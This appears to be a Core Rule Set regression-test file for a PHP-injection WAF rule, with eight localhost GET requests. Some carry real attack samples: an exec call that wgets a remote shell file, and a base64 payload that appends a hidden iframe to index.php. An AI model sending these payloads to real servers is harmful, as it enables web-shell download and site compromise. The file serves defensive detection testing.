---
meta:
  author: "csanders-git, Franziska Bühler, azurit"
rule_id: 933100
tests:
  - test_id: 1
    desc: PHP Injection Attack (933100) from old modsec regressions
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            Accept-Encoding: gzip,deflate
            Accept-Language: en-us,en;q=0.5
            Host: localhost
            Keep-Alive: '300'
            Proxy-Connection: keep-alive
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=<?exec('wget%20http://r57.biz/r57.txt%20-O"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [933100]
  - test_id: 2
    desc: PHP Injection Attack (933100) from old modsec regressions
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            Accept-Encoding: gzip,deflate
            Accept-Language: en-us,en;q=0.5
            Host: localhost
            Keep-Alive: '300'
            Proxy-Connection: keep-alive
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by5wb2Rnb3J6Lm9yZy96dW8vZWxlbi9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT48P3BocA%3D%3D%5C%22)%2C%20FILE_APPEND)%3B%20%3F%3E"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [933100]
  - test_id: 3
    desc: "PHP injection attack: looking for [/php] closing tag"
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "*/*"
            Host: "localhost"
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=somePhpWouldGoHere%5B%2Fphp%5D"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [933100]
  - test_id: 4
    desc: 'PHP injection attack: looking for [\php] closing tag'
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "*/*"
            Host: "localhost"
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=somePhpWouldGoHere%5B%5Cphp%5D"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [933100]
  - test_id: 5
    desc: |
      xml/php polyglot payload, using a PHP
      decoded payload: <?xml :echo 1;'
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "*/*"
            Host: "localhost"
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=%3C%3Fxml%20%3Aecho%201%3B"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [933100]
  - test_id: 6
    desc: |
      xml/php polyglot payload, using a PHP, uppercase test
      decoded payload: <?XML :echo 1;'
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "*/*"
            Host: "localhost"
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=%3C%3Fxml%20%3Aecho%201%3B"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [933100]
  - test_id: 7
    desc: |
      xml/php polyglot payload, using a PHP
      decoded payload: <?xml :fputCSV($alreadyOpenFile, array("foo", "bar", "hello", "world"));'
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "*/*"
            Host: "localhost"
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=%3C%3Fxml%20%3AfputCSV%28%24alreadyOpenFile%2C%20array%28%22foo%22%2C%20%22bar%22%2C%20%22hello%22%2C%20%22world%22%29%29%3B"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [933100]
  - test_id: 8
    desc: |
      xml/php polyglot payload, using a PHP
      decoded payload: <?xml   						 ();echo 1;
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: "*/*"
            Host: "localhost"
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: "/get?foo=%3C%3Fxml%20%20%20%09%09%09%09%09%09%20%28%29%3Becho%201%3B"
          version: HTTP/1.0
        output:
          log:
            expect_ids: [933100]
